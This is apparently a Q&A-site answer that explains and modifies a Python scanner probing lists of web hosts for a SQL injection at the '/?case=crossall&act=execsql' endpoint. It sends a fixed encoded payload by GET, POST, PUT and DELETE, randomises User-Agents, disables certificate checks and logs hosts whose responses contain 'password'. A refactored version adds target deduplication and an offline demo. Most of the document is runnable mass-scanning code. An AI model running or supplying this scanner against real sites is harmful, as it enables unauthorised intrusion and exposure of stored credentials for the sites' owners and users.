This code is a multithreaded URL scanning script that checks whether a target is vulnerable to SQL injection through one fixed endpoint, `/?case=crossall&act=execsql`. Every probe sends the same fixed value in the `sql` parameter (the string `Ud-ZGLMFKBOhqavNJNK5WRCu9igJtYN1rVCO8hMFRM8NIKe6qmhRfWexXUiOqRN4aCe9aUie4Rtw5`, used verbatim; the page does not explain how it is encoded). The detection logic is as follows:

1. Send a GET request to URL + "/?case=crossall&act=execsql&sql=Ud-ZGLMFKBOhqavNJNK5WRCu9igJtYN1rVCO8hMFRM8NIKe6qmhRfWexXUiOqRN4aCe9aUie4Rtw5". If the status code is 200 and the response body contains "password", the URL is judged injectable.

2. If step 1 does not hit, send a POST request to URL + "/?case=crossall&act=execsql" with the form parameter "sql=Ud-ZGLMFKBOhqavNJNK5WRCu9igJtYN1rVCO8hMFRM8NIKe6qmhRfWexXUiOqRN4aCe9aUie4Rtw5". If the status code is 200 and the response body contains "password", the URL is judged injectable.

3. If step 2 does not hit, send a PUT request to URL + "/?case=crossall&act=execsql&sql=Ud-ZGLMFKBOhqavNJNK5WRCu9igJtYN1rVCO8hMFRM8NIKe6qmhRfWexXUiOqRN4aCe9aUie4Rtw5", with the raw request body "Ud-ZGLMFKBOhqavNJNK5WRCu9igJtYN1rVCO8hMFRM8NIKe6qmhRfWexXUiOqRN4aCe9aUie4Rtw5" (so the payload travels both in the query string and in the body) and a Content-Type header of "application/x-www-form-urlencoded". If the status code is 200 and the response body contains "password", the URL is judged injectable.

4. If step 3 does not hit, send a DELETE request to URL + "/?case=crossall&act=execsql&sql=Ud-ZGLMFKBOhqavNJNK5WRCu9igJtYN1rVCO8hMFRM8NIKe6qmhRfWexXUiOqRN4aCe9aUie4Rtw5" with a Content-Type header of "application/x-www-form-urlencoded". If the status code is 200 and the response body contains "password", the URL is judged injectable.

5. If none of the four probes hits, the URL is judged not injectable.

Each URL judged injectable is printed to the console and appended to the file "vuln.txt". Note that the PUT and DELETE probes reuse the same URL as the GET probe, so the recorded URL does not say which HTTP method produced the hit; redirects are not followed (`allow_redirects=False`), so a 30x answer never counts as a hit.

Known problems:

1. The script only tests for the presence of the injection; it does not probe the injection point further, so it cannot tell the injection type or the exact working statement. The match criterion is also loose: any 200 response whose body contains the substring "password" counts, so an ordinary login page served at that path (with an `<input type="password">` field, for example) produces a false positive, while a vulnerable target whose query output happens not to contain "password" is missed.

2. The script sends one fixed payload only; it cannot adapt to variants of the endpoint or to bypass techniques, so coverage is incomplete.

3. The script does not filter or deduplicate the input URLs. Because `check_url` reduces every URL to `scheme://host[:port]` before probing, a list that contains several paths on the same host probes that host several times, and blank or malformed lines produce wasted requests.

Below is the script with its output section changed to print the specific request URL that was found injectable:

```python
import requests
import sys
import urllib3
from argparse import ArgumentParser
import threadpool
from urllib import parse
from time import time
import random
import logging

urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

url_list = []
# the fixed payload sent in every probe (its encoding is not explained here)
SQL_PAYLOAD = "Ud-ZGLMFKBOhqavNJNK5WRCu9igJtYN1rVCO8hMFRM8NIKe6qmhRfWexXUiOqRN4aCe9aUie4Rtw5"


def get_ua():
    # random Chrome-style User-Agent so the probes do not all look identical
    first_num = random.randint(55, 62)
    third_num = random.randint(0, 3200)
    fourth_num = random.randint(0, 140)
    os_type = [
        '(Windows NT 6.1; WOW64)',
        '(Windows NT 10.0; WOW64)',
        '(Macintosh; Intel Mac OS X 10_12_6)'
    ]
    chrome_version = 'Chrome/{}.0.{}.{}'.format(first_num, third_num, fourth_num)
    ua = ' '.join(['Mozilla/5.0', random.choice(os_type), 'AppleWebKit/537.36',
                   '(KHTML, like Gecko)', chrome_version, 'Safari/537.36'])
    return ua


def write_targets(vurl, filename):
    # append each vulnerable request URL to the result file
    with open(filename, "a+") as f:
        f.write(vurl + "\n")


def check_url(url):
    # keep only scheme://host[:port]; the probe path is appended below
    url = parse.urlparse(url)
    url = '{}://{}'.format(url[0], url[1])
    headers = {'User-Agent': get_ua()}
    try:
        # 1. GET request, payload in the query string
        url_1 = url + "/?case=crossall&act=execsql&sql=" + SQL_PAYLOAD
        res_1 = requests.get(url_1, verify=False, allow_redirects=False,
                             headers=headers, timeout=5)
        if res_1.status_code == 200 and 'password' in res_1.text:
            print("\033[32m[+]{}\033[0m".format(url_1))
            write_targets(url_1, "vuln.txt")
        else:
            # 2. POST request, payload as a form field
            url_2 = url + "/?case=crossall&act=execsql"
            data_2 = {"sql": SQL_PAYLOAD}
            res_2 = requests.post(url_2, verify=False, allow_redirects=False,
                                  headers=headers, data=data_2, timeout=5)
            if res_2.status_code == 200 and 'password' in res_2.text:
                print("\033[32m[+]{}\033[0m".format(url_2))
                write_targets(url_2, "vuln.txt")
            else:
                # 3. PUT request, payload in the query string and as raw body
                url_3 = url + "/?case=crossall&act=execsql&sql=" + SQL_PAYLOAD
                data_3 = SQL_PAYLOAD
                headers_3 = {"Content-Type": "application/x-www-form-urlencoded"}
                res_3 = requests.put(url_3, verify=False, allow_redirects=False,
                                     headers=headers_3, data=data_3, timeout=5)
                if res_3.status_code == 200 and 'password' in res_3.text:
                    print("\033[32m[+]{}\033[0m".format(url_3))
                    write_targets(url_3, "vuln.txt")
                else:
                    # 4. DELETE request, payload in the query string only
                    url_4 = url + "/?case=crossall&act=execsql&sql=" + SQL_PAYLOAD
                    headers_4 = {"Content-Type": "application/x-www-form-urlencoded"}
                    res_4 = requests.delete(url_4, verify=False, allow_redirects=False,
                                            headers=headers_4, timeout=5)
                    if res_4.status_code == 200 and 'password' in res_4.text:
                        print("\033[32m[+]{}\033[0m".format(url_4))
                        write_targets(url_4, "vuln.txt")
                    else:
                        # 5. no probe hit: the target is treated as not injectable
                        pass
    except Exception as e:
        logging.error(e)


def multithreading(url_list, pools=5):
    # run check_url over the list with a fixed-size thread pool
    works = list(url_list)
    pool = threadpool.ThreadPool(pools)
    reqs = threadpool.makeRequests(check_url, works)
    for req in reqs:
        pool.putRequest(req)
    pool.wait()


if __name__ == '__main__':
    arg = ArgumentParser(description='check_url By m2')
    arg.add_argument("-u", "--url", help="Target URL; Example:http://ip:port")
    arg.add_argument("-f", "--file", help="Target URL list; Example:url.txt")
    args = arg.parse_args()
    url = args.url
    filename = args.file
    print("[+]Task started.....")
    start = time()
    if url is not None and filename is None:
        check_url(url)
    elif url is None and filename is not None:
        for i in open(filename):
            i = i.replace('\n', '')
            url_list.append(i)
        multithreading(url_list, 10)
    end = time()
    print('Task finished in %ds.' % (end - start))
```
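The following is an added example, not part of the original script or the question. It reworks the four-method probe sequence of steps 1 to 5 as a data-driven table and addresses problem 3 by normalising and deduplicating targets before scanning. The HTTP transport is injected as a function so the logic can be run and tested offline against constructed responses; `fake_transport`, the host names `vuln.example`, `login.example` and `safe.example`, and the sample input list are all constructed for the demo. The assumption that a bare host is plain HTTP is marked in the code.

```python
"""Method-agnostic probe for the case=crossall&act=execsql endpoint with
target normalisation/dedup and an injectable transport (added example)."""
from concurrent.futures import ThreadPoolExecutor
from typing import Callable, Iterable, Optional, Tuple
from urllib.parse import urlsplit

SQL_PAYLOAD = "Ud-ZGLMFKBOhqavNJNK5WRCu9igJtYN1rVCO8hMFRM8NIKe6qmhRfWexXUiOqRN4aCe9aUie4Rtw5"
ENDPOINT = "/?case=crossall&act=execsql"
FORM = {"Content-Type": "application/x-www-form-urlencoded"}

# (method, path, body, extra headers), in the order the original script tries them
PROBES = [
    ("GET",    ENDPOINT + "&sql=" + SQL_PAYLOAD, None,                 {}),
    ("POST",   ENDPOINT,                         {"sql": SQL_PAYLOAD}, {}),
    ("PUT",    ENDPOINT + "&sql=" + SQL_PAYLOAD, SQL_PAYLOAD,          FORM),
    ("DELETE", ENDPOINT + "&sql=" + SQL_PAYLOAD, None,                 FORM),
]

# transport: (method, url, body, headers) -> (status_code, response_text)
Transport = Callable[[str, str, object, dict], Tuple[int, str]]


def normalize_target(raw: str) -> Optional[str]:
    """Reduce a line from the input list to lower-cased scheme://host[:port].
    Returns None for blank or malformed lines so they are never probed."""
    raw = raw.strip()
    if not raw:
        return None
    if "://" not in raw:
        raw = "http://" + raw  # assumption: a bare host is plain HTTP
    parts = urlsplit(raw)
    if parts.scheme not in ("http", "https") or not parts.hostname:
        return None
    host = parts.hostname  # urlsplit already lower-cases the host
    default_port = 80 if parts.scheme == "http" else 443
    if parts.port and parts.port != default_port:
        host += ":%d" % parts.port
    return "%s://%s" % (parts.scheme, host)


def dedupe_targets(lines: Iterable[str]) -> list:
    """Normalise every line and keep the first occurrence of each target."""
    seen, out = set(), []
    for line in lines:
        target = normalize_target(line)
        if target and target not in seen:
            seen.add(target)
            out.append(target)
    return out


def looks_vulnerable(status: int, text: str) -> bool:
    # same loose criterion as the original script: 200 + "password" in the body
    return status == 200 and "password" in text


def probe_target(base: str, send: Transport) -> Optional[Tuple[str, str]]:
    """Try the probes in order; return (method, url) of the first hit, else None.
    Recording the method fixes the original's ambiguity between GET/PUT/DELETE."""
    for method, path, body, extra in PROBES:
        url = base + path
        try:
            status, text = send(method, url, body, extra)
        except Exception:
            continue  # a transport error on one probe must not abort the others
        if looks_vulnerable(status, text):
            return (method, url)
    return None


def requests_transport(method, url, body, extra):
    """Live transport on top of requests (imported lazily; not used offline)."""
    import requests
    r = requests.request(method, url, data=body, headers=extra,
                         verify=False, allow_redirects=False, timeout=5)
    return r.status_code, r.text


def scan(lines: Iterable[str], send: Transport, workers: int = 10) -> dict:
    """Dedupe the input and probe each target concurrently; map target -> hit."""
    targets = dedupe_targets(lines)
    with ThreadPoolExecutor(max_workers=workers) as pool:
        results = list(pool.map(lambda t: probe_target(t, send), targets))
    return {t: r for t, r in zip(targets, results) if r}


def fake_transport(method, url, body, extra):
    """Constructed responses for the offline demo: vuln.example answers only
    to the POST probe; login.example serves a benign login form that still
    satisfies the loose check (false positive); everything else is 404."""
    if "vuln.example" in url and method == "POST" and body == {"sql": SQL_PAYLOAD}:
        return 200, "<pre>1 | admin | password | ...</pre>"
    if "login.example" in url:
        return 200, '<input type="password" name="pw">'
    return 404, ""


if __name__ == "__main__":
    sample = ["http://vuln.example/index.php", "VULN.example:80/", "",
              "https://safe.example:8443", "login.example"]  # constructed input
    for target, (method, url) in scan(sample, fake_transport).items():
        print("[+] %s %s" % (method, url))
```

Running the demo reports `POST http://vuln.example/?case=crossall&act=execsql` once (the two spellings of that host collapse to one target) and also flags `login.example` on the GET probe, which illustrates why the `"password"` substring check from problem 1 needs tightening before the output is trusted.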

Original question: analyze the code below and change its output section so that it prints the specific request URL that has SQL injection; give the concrete code. (The code attached to the question is the script reproduced above.)

Source: https://www.cveoy.top/t/topic/czTo. Copyright belongs to the author. Do not repost or scrape.
